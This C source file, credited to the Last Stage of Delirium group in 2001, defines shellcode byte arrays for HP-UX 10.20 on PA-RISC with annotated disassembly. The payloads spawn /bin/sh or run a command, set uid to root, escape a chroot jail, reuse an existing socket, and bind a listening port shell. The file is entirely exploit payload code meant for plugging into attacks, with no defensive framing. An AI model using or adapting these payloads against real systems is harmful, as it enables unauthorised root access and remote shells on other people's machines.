/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for hp-ux 10.20 parisc                                         #*/

/*
syscall     %r22 %r26,%r25,%r24,%r23
----------- ---- ---------------------------------------------------------------
execv       x00b ->path="/bin/sh",0
execv       x00b ->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0]
setresuid   x07e 0,0,0
mkdir       x088 ->path="a..",mode= (each value is valid)
chroot      x03d ->path={"a..","."}
chdir       x00c ->path=".."
getpeername x116 sfd,->sadr=[],->[0x10]
socket      x122 AF_INET=2,SOCK_STREAM=1,prot=0
bind        x114 sfd,->sadr=[0x61,2,hi,lo,0,0,0,0],len=0x10
listen      x119 sfd,backlog=5
accept      x113 sfd,0,0
dup2        x05a sfd,fd={0,1,2}
*/

#if defined(PARISC) && defined(HPUX)

char shellcode[]=          /* 7*4+8 bytes                    */
    "\xeb\x5f\x1f\xfd"     /* bl      <shellcode+4>,%r26     */
    "\x0b\x39\x02\x99"     /* xor     %r25,%r25,%r25         */
    "\xb7\x5a\x40\x22"     /* addi,<  0x11,%r26,%r26         */
    "\x0f\x40\x12\x0e"     /* stbs    %r0,7(%r26)            */
    "\x20\x20\x08\x01"     /* ldil    L%0xc0000004,%r1       */
    "\xe4\x20\xe0\x08"     /* ble     R%0xc0000004(%sr7,%r1) */
    "\xb4\x16\x70\x16"     /* addi,>  0xb,%r0,%r22           */
    "/bin/sh"
;

char cmdshellcode[]=       /* 14*4+12+cmdlen bytes           */
    "\xeb\x5f\x1f\xfd"     /* bl      <cmdshellcode+4>,%r26  */
    "\x20\x20\x08\x01"     /* ldil    L%0xc0000004,%r1       */
    "\xb7\x5a\x40\x5a"     /* addi,<  0x2d,%r26,%r26         */
    "\xb7\x56\x40\x10"     /* addi,<  0x8,%r26,%r22          */
    "\xb7\x55\x40\x18"     /* addi,<  0xc,%r26,%r21          */
    "\x0f\x40\x12\x0e"     /* stbs    %r0,0x7(%r26)          */
    "\x0f\x40\x12\x14"     /* stbs    %r0,0xa(%r26)          */
    "\x6b\x5a\x3f\x99"     /* stw     %r26,-0x34(%r26)       */
    "\x6b\x56\x3f\xa1"     /* stw     %r22,-0x30(%r26)       */
    "\x6b\x55\x3f\xa9"     /* stw     %r21,-0x2c(%r26)       */
    "\x6b\x40\x3f\xb1"     /* stw     %r0, -0x28(%r26)       */
    "\xb7\x59\x47\x99"     /* addi,<  -0x34,%r26,%r25        */
    "\xe4\x20\xe0\x08"     /* ble     R%0xc0000004(%sr7,%r1) */
    "\xb4\x16\x70\x16"     /* addi,>  0x0b,%r0,%r22          */
    "/bin/sh -c  "
    /* command */
;

char setresuidcode[]=      /* 6*4 bytes                      */
     "\x0b\x5a\x02\x9a"    /* xor     %r26,%r26,%r26         */
     "\x0b\x39\x02\x99"    /* xor     %r25,%r25,%r25         */
     "\x0b\x18\x02\x98"    /* xor     %r24,%r24,%r24         */
     "\x20\x20\x08\x01"    /* ldil    L%0xc0000004,%r1       */
     "\xe4\x20\xe0\x08"    /* ble     R%0xc0000004(%sr7,%r1) */
     "\xb4\x16\x70\xfc"    /* addi,>  0x7e,%r0,%r22          */
;

char chrootcode[]=         /* 24*4 bytes                     */
    "\xb4\x17\x40\x04"     /* addi,<  0x2,%r0,%r23           */
    "\xeb\x57\x40\x02"     /* blr,n   %r23,%r26              */
    "\x20\x20\x08\x01"     /* ldil    L%0xc0000004,%r1       */
    "\xe4\x20\xe0\x08"     /* ble     R%0xc0000004(%sr7,%r1) */
    "\x0a\xf7\x02\x97"     /* xor     %r23,%r23,%r23         */
    "\xe8\x40\xc0\x02"     /* bv,n    0(%rp)		     */
    "\x61\x2e\x2e\x2e"     /* a...                           */
    "\xb7\x5a\x40\x12"     /* addi,<  0x9,%r26,%r26          */
    "\x08\x1a\x06\x0c"     /* add     %r26,%r0,%r12          */
    "\x0d\x80\x12\x06"     /* stbs    %r0,0x3(%r12)          */
    "\xe8\x5f\x1f\xad"     /* bl      <chrootcode+4>,%rp     */
    "\xb4\x16\x71\x10"     /* addi,>  0x88,%r0,%r22          */
    "\x08\x0c\x06\x1a"     /* add     %r12,%r0,%r26          */
    "\xe8\x5f\x1f\x95"     /* bl      <chrootcode+4>,%rp     */
    "\xb4\x16\x70\x7a"     /* addi,>  0x3d,%r0,%r22          */
    "\xb4\x0d\x01\xfe"     /* addi    0xff,%r0,%r13          */
    "\xb5\x9a\x40\x02"     /* addi,<  0x1,%r12,%r26          */
    "\xe8\x5f\x1f\x75"     /* bl      <chrootcode+4>,%rp     */
    "\xb4\x16\x70\x18"     /* addi,>  0xc,%r0,%r22           */
    "\x88\x0d\x3f\xdd"     /* combf,= %r13,%r0,<chrootcode+64> */
    "\xb5\xad\x07\xff"     /* addi    -0x1,%r13,%r13         */
    "\xb5\x9a\x40\x04"     /* addi,<  0x2,%r12,%r26          */
    "\xe8\x5f\x1f\x4d"     /* bl      <chrootcode+4>,%rp     */
    "\xb4\x16\x70\x7a"     /* addi,>  0x3d,%r0,%r22          */
;

char findsckcode[]=        /* 30*4 bytes                     */
    "\xe9\x9f\x1f\xfd"     /* bl      <findsckcode+4>,%r12   */
    "\x0b\x18\x02\x98"     /* xor     %r24,%r24,%r24         */
    "\xb4\x0e\x01\xde"     /* addi    0xef,%r0,%r14          */
    "\xb5\x98\x07\xd3"     /* addi    -0x17,%r12,%r24        */
    "\xb5\x99\x07\xdb"     /* addi    -0x13,%r12,%r25        */
    "\x08\x0e\x06\x1a"     /* add     %r14,%r0,%r26          */
    "\x20\x20\x08\x01"     /* ldil    L%0xc0000004,%r1       */
    "\xe4\x20\xe0\x08"     /* ble     R%0xc0000004(%sr7,%r1) */
    "\xb4\x16\x02\x2c"     /* addi    0x116,%r0,%r22         */
    "\x80\x1c\x20\x20"     /* comb,=  %ret0,%r0,<findsckcode+60> */
    "\x0b\x18\x02\x98"     /* xor     %r24,%r24,%r24         */
    "\xb5\xce\x07\xff"     /* addi    -0x1,%r14,%r14         */
    "\x88\x0e\x3f\xad"     /* combf,= %r14,%r0,<findsckcode+12>  */
    "\x0b\x18\x02\x98"     /* xor     %r24,%r24,%r24         */
    "\x61\x61\x12\x34" 
    "\xb5\x99\x06\x3f"     /* addi    -0xe1,%r12,%r25        */
    "\x47\x2f\x02\x20"     /* ldh     0x110(%r25),%r15       */
    "\x45\x90\x3f\xdf"     /* ldh     -0x11(%r12),%r16       */
    "\x82\x0f\x20\x10"     /* comb,=  %r15,%r16,<findsckcode+88> */
    "\x0b\x18\x02\x98"     /* xor     %r24,%r24,%r24         */
    "\x8a\x0f\x3f\x6d"     /* combf,= %r15,%r16,<findsckcode+12> */
    "\xb5\xce\x07\xff"     /* addi    -0x1,%r14,%r14         */
    "\xb4\x0f\x40\x04"     /* addi,<  0x2,%r0,%r15           */
    "\x08\x0e\x06\x1a"     /* add     %r14,%r0,%r26          */
    "\x08\x0f\x06\x19"     /* add     %r15,%r0,%r25          */
    "\x20\x20\x08\x01"     /* ldil    L%0xc0000004,%r1       */
    "\xe4\x20\xe0\x08"     /* ble     R%0xc0000004(%sr7,%r1) */ 
    "\xb4\x16\x70\xb4"     /* addi,>  0x5a,%r0,%r22          */
    "\x88\x0f\x3f\xcd"     /* combf,= %r15,%r0,<findsckcode+92> */
    "\xb5\xef\x07\xff"     /* addi    -0x1,%r15,%r15         */
;

char bindsckcode[]=        /* 37*4 bytes                     */
    "\xb4\x17\x40\x04"     /* addi,<  0x2,%r0,%r23           */
    "\xe9\x97\x40\x02"     /* blr,n   %r23,%r12              */
    "\x20\x20\x08\x01"     /* ldil    L%0xc0000004,%r1       */
    "\xe4\x20\xe0\x08"     /* ble     R%0xc0000004(%sr7,%r1) */
    "\x0a\xf7\x02\x97"     /* xor     %r23,%r23,%r23         */
    "\xe8\x40\xc0\x02"     /* bv,n    0(%rp)                 */
    "\x61\x02\x23\x45"
    "\xb4\x1a\x40\x04"     /* addi,<  0x2,%r0,%r26           */
    "\xb4\x19\x40\x02"     /* addi,<  0x1,%r0,%r25           */
    "\x0b\x18\x02\x98"     /* xor     %r24,%r24,%r24         */
    "\xe8\x5f\x1f\xad"     /* bl      <bindsckcode+4>,%rp    */
    "\xb4\x16\x72\x44"     /* addi,>  0x122,%r0,%r22         */
    "\x08\x1c\x06\x0d"     /* add     %ret0,%r0,%r13         */
    "\xb5\x8c\x40\x10"     /* addi,<  0x8,%r12,%r12          */
    "\xb4\x18\x40\x20"     /* addi,<  0x10,%r0,%r24          */
    "\x08\x0d\x06\x1a"     /* add     %r13,%r0,%r26          */
    "\x0d\x80\x12\x8a"     /* stw     %r0,0x5(%r12)          */
    "\xb5\x99\x40\x02"     /* addi,<  0x1,%r12,%r25          */
    "\xe8\x5f\x1f\x6d"     /* bl      <bindsckcode+4>,%rp    */
    "\xb4\x16\x72\x28"     /* addi,>  0x114,%r0,%r22         */
    "\x08\x0d\x06\x1a"     /* add     %r13,%r0,%r26          */
    "\xb4\x19\x40\x02"     /* addi,<  0x1,%r0,%r25           */
    "\xe8\x5f\x1f\x4d"     /* bl      <bindsckcode+4>,%rp    */
    "\xb4\x16\x72\x32"     /* addi,>  0x119,%r0,%r22         */
    "\x08\x0d\x06\x1a"     /* add     %r13,%r0,%r26          */
    "\x0b\x39\x02\x99"     /* xor     %r25,%r25,%r25         */
    "\x0b\x18\x02\x98"     /* xor     %r24,%r24,%r24         */
    "\xe8\x5f\x1f\x25"     /* bl      <bindsckcode+4>,%rp    */
    "\xb4\x16\x72\x26"     /* addi,>  0x113,%r0,%r22         */
    "\xb4\x0e\x40\x04"     /* addi,<  0x2,%r0,%r14           */
    "\x08\x1c\x06\x0c"     /* add     %ret0,%r0,%r12         */
    "\x08\x0c\x06\x1a"     /* add     %r12,%r0,%r26          */
    "\x08\x0e\x06\x19"     /* add     %r14,%r0,%r25          */
    "\xe8\x5f\x1e\xf5"     /* bl      <bindsckcode+4>,%rp    */
    "\xb4\x16\x70\xb4"     /* addi,>  0x5a,%r0,%r22          */
    "\x88\x0e\x3f\xd5"     /* combf,= %r14,%r0,<bindsckcode+124> */
    "\xb5\xce\x07\xff"     /* addi    -0x1,%r14,%r14         */
;

char jump[]=
    "\xe0\x40\x00\x00"     /* be      0x0(%sr0,%rp)          */
    "\x37\xdc\x00\x00"     /* copy    %sp,%ret0              */
;

#define FINDSCKPORTOFS     58
#define BINDSCKPORTOFS     26

#endif
